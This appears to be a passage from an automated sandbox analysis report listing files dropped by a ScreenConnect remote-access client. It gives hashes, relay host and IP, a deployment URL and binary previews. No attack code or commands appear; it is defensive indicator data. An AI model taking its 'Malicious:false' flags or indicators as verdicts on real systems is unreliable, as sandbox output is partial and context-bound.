                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a09</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\pqxqr4pd.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.027489542286802
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCD8/vXbAa3xT:2dL9hK6E46YPRNYSvH
                                                                                                                                                                                                                                        MD5:AB87C30576B82BF1519BB5C0F4C1892A
                                                                                                                                                                                                                                        SHA1:B70F1AEC9059B13FE11BCDE860326F840606519F
                                                                                                                                                                                                                                        SHA-256:B864AEFD7862D7A3481DAE9A1879A7CF3E55461D284D6E04B20374E3C38D44F1
                                                                                                                                                                                                                                        SHA-512:4328C4F32EBE5C9B55B706B7FF1E6F05D984F310626D519602EDC2C0C113F8FD79C6F13791EAD12AD3C84CDDD36402CB4F5D51A0C518483BC64CD90C8D15C9B4
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a24</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\rz1jkipe.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.025006993424163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDb/vXbAa3xT:2dL9hK6E46YPRNYjvH
                                                                                                                                                                                                                                        MD5:EDB2E8587D18334A40E10B09C3439CB5
                                                                                                                                                                                                                                        SHA1:00A1E535CD65A0B8B13C357D3704D5460C798B03
                                                                                                                                                                                                                                        SHA-256:2048DF39D2DCBCCD4A9E0945976BD252118365C35AA34217054C493679024AE6
                                                                                                                                                                                                                                        SHA-512:1AEA17FB24201C594812C7CC2A6BF4F3AFD2C7460B84428DB841551AD3EDB0C4540139FDBC082D1306D9EE3B7C6D376216207613D1414015BEBF9F5F636C3035
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a22</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\user.config (copy)

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.028155548408631
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDYC5/vXbAa3xT:2dL9hK6E46YPRNYYCRvH
                                                                                                                                                                                                                                        MD5:F2B508086B50069A37A6DBA07AF6CE62
                                                                                                                                                                                                                                        SHA1:DC53B1C2AD9C9ABA41F307E6CDB547029396133B
                                                                                                                                                                                                                                        SHA-256:31E3EB97C15C09ED60CBE9E875BC72099BE8F0F6679A9F409374021B8D8A83E8
                                                                                                                                                                                                                                        SHA-512:3124968125928CC8D206E11568BD4980113175FD713F434915F56AD0FB4C49F78D2FDC46B22A3C7A10AAD39094BD6D02497C6BC76A4863DFDABBCB6035EFFDAC
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a23%3a14</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\yknllasw.newcfg

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):582
                                                                                                                                                                                                                                        Entropy (8bit):5.0296960930001084
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENONl7Y8qqpCDu/vXbAa3xT:2dL9hK6E46YPRNYUvH
                                                                                                                                                                                                                                        MD5:EF7E1429AE5707438C291EFC842B222C
                                                                                                                                                                                                                                        SHA1:F7F6AAE628A258AC9AC53FD51A0B3E5822C19913
                                                                                                                                                                                                                                        SHA-256:A6B3043AD46C9B5C72CC5FF476093208365E51FBE8D7BA7B5FCBCD96657B36EF
                                                                                                                                                                                                                                        SHA-512:7E80E22445E758170204985B025916FF8F519D63401376CA7DAA763D4B337C58C454A766D1A3554AF7F1CA202CE3989A7DDE1A46FCBB1254A4829395A8C21EB0
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>instance-l7g4dh-relay.screenconnect.com=147.75.81.4-20%2f12%2f2024%2017%3a24%3a38</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..vice_4b14c015c87c1ad8_0018.0004_none_053cb64092bcadcb\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):68608
                                                                                                                                                                                                                                        Entropy (8bit):6.064454014855692
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:KQZMEtZ8j8Mk6Y6lXQiA1FBwtc5QFVIl1h5FYb8h:Vb2jbfZUFmMQFVQPh
                                                                                                                                                                                                                                        MD5:26AE3ECD5B370434E3147A4F7638E408
                                                                                                                                                                                                                                        SHA1:26684D1CFA1DBE03E00B87FE0998DBDD324B97E1
                                                                                                                                                                                                                                        SHA-256:31B75F440F94BF6831EC57DC95F2FE09B88F16FA0356F99B72B925D4308126EB
                                                                                                                                                                                                                                        SHA-512:2811A08546A79603499D146061CAB25C6ECBB9DDBEA389DECD85112009140C7B9379A5A708ABF41C9C1C37D853499218B233929EBAEC4679282B48ED9EEE51CA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....O............" ..0.............."... ...@....... ....................................@..................................!..O....@.......................`.......!..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................!......H.......po..,.................... ........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....f...s....%.,...(...+*vs....%.}P.........s....(....*....0..&........s....}.....s....}...........}....s.......}R......{R...(#.....}Q.....}.....(....&.(&..........s....o.....(&...~-...%-.&~+.....g...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s:...}....... ..6........s....s:...}.....($..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1373
                                                                                                                                                                                                                                        Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                        MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                        SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                        SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                        SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                        Size (bytes):1662
                                                                                                                                                                                                                                        Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                        MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                        SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                        SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                        SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Apps\2.0\Z21E79P7.AXJ\O772B6ND.YZA\scre..tion_25b0fbb6ef7eb094_0018.0004_0dfe8c087a088a74\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                        File Type:CSV text
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):847
                                                                                                                                                                                                                                        Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                        MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                        SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                        SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                        SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\NL9Z8XK8.log

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with very long lines (645), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):14862
                                                                                                                                                                                                                                        Entropy (8bit):3.806900096331163
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:96:t6BKedd2TtFdbKBBaOy0l8dd2TtFdZVE71+/5X8gQkFOdd2TtFdu0waudPL5oIZd:Tr5KaqrhE7Ujr64LEv
                                                                                                                                                                                                                                        MD5:33F97665B53E5CF45AAF7122719E04D1
                                                                                                                                                                                                                                        SHA1:A6062A3EE7B582833299939D33287BE12BF3D0ED
                                                                                                                                                                                                                                        SHA-256:CBBDC1C077D6B21CB6599516B1B3E1CF9D1637AEB848CE950F6CABA5212CC3B0
                                                                                                                                                                                                                                        SHA-512:542F026880E1A2CE5C7C49E4A13183EEA40BF394B2E75A61661A9A9E5C83AA21FB2690FE1FD1DE6CB0E85DF0A62A56AAD68E39FF053BE06873DE6136AA0D50DF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.k.o.i.d.e.s.f.a.c...s.c.r.e.e.n.c.o.n.n.e.c.t...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.i.n.s.t.a.n.c.e.-.l.7.g.4.d.h.-.r.e.l.a.y...s.c.r.e.e.n.c.o.n.n.e.c.t...c.o.m.&.

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\1HDHK8BL.AYM\DT8ROC9L.T2M.application

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):118570
                                                                                                                                                                                                                                        Entropy (8bit):5.58802022381172
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Q0/CcT51/FXvMVNWfCXq9ymKQm2o9HuzhJOvP:ZCcfiVIEQmt8vOvP
                                                                                                                                                                                                                                        MD5:F450107E1E082AB0A9F72C187D9CD440
                                                                                                                                                                                                                                        SHA1:DBAE33BCEA9D70C0B32E01D9BD0BFBC5AC3CD087
                                                                                                                                                                                                                                        SHA-256:B1A80158AD4B45F74C4A74F943CFF18F6888DBAE987C4C34717B6EEF9F1CF9B9
                                                                                                                                                                                                                                        SHA-512:4122737EF3F4EF05E7F1FE45DE96BC974CB153C236B9E66B62FFD71088F06D43E9E031994382378102504C0E62A262B335E6A5BF1FC29BEF566CC6233C6DBAE7
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.4.2.9083" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):197120
                                                                                                                                                                                                                                        Entropy (8bit):6.586698462937567
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:zxLtNGBlIyS7/OXjusqVFJRJcyzvyqSmzDvJXYz:htNGBGySaXqPJY5qSmG
                                                                                                                                                                                                                                        MD5:5F31CB0A5524DF64FEFF668D581F075E
                                                                                                                                                                                                                                        SHA1:F111EFE5C55E42BE6CE2ED9E5703E30A5D743D43
                                                                                                                                                                                                                                        SHA-256:47D471E33377DB7F96FF84B4CFCC420CF770A77219BCB0CE55446490211A5DF3
                                                                                                                                                                                                                                        SHA-512:0DEB969C51D1A7B1A8B608BD47A77940E6A88E8AAD7534800C2C2D5DFDFC298F02128C8D9742ABE3019D9EBEB5906185D6C3DD159C29749B2A903F04A28B18E6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0.................. ... ....... .......................`......j{....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                        Entropy (8bit):5.148447070499623
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AWR7vNxW57FpS+iENg49vNxW5NgMRNg49vNxWO:JdFYZ8h9onRigeP0AJvSkcyMDcVSkTo
                                                                                                                                                                                                                                        MD5:131D3A2329559EDB69DFAE83D4F7FF6F
                                                                                                                                                                                                                                        SHA1:16E303B64B7007C64A5FACC76A3876B3AD8BFC6F
                                                                                                                                                                                                                                        SHA-256:78B036CA84FBE94BC5DCFFA3F8BFB563ABBEC1E645C2053043C288A896EEE760
                                                                                                                                                                                                                                        SHA-512:7D5CAD1324B4B7275967F657648FADA1BA74A15497678F5FAF1430758ACC8B0E442D5E7EB2707AC37785480FED139D270831A54F14EB640F54F633EACC9087DB
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.4.2.9083" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.4.2.9083" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\Deployment\3YA9QJAO.L53\MGBEYNA2.8KP\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):68608
                                                                                                                                                                                                                                        Entropy (8bit):6.064454014855692
                                                                                                                                                                                                                                        Encrypted:false
